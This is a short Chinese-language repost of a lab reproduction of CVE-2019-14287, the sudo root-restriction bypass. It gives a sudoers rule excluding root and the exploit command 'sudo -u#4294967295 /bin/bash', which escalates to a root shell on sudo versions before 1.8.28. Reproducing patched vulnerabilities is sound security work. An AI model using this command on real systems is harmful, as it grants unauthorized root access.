(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

发布时间：2020-12-14 00:15:42 所属栏目：Linux 来源：网络整理

导读：1：查看测试机sudo版本号，确认是受影响版本。 2：创建账号test 3：进入/etc,备份一下sudoers到/root，然后修改sudoers内容，添加： test??ALL=(ALL,!root)?/bin/bash 4：登录test账号， ? ?sudo?-u#4294967295?/bin/bash ? ? 受影响的Sudo版本： 1.8.28之前

1：查看测试机sudo版本号，确认是受影响版本。

2：创建账号test

3：进入/etc,备份一下sudoers到/root，然后修改sudoers内容，添加：

test??ALL=(ALL,!root)?/bin/bash

4：登录test账号，

?sudo?-u#4294967295?/bin/bash

受影响的Sudo版本：

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接：
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!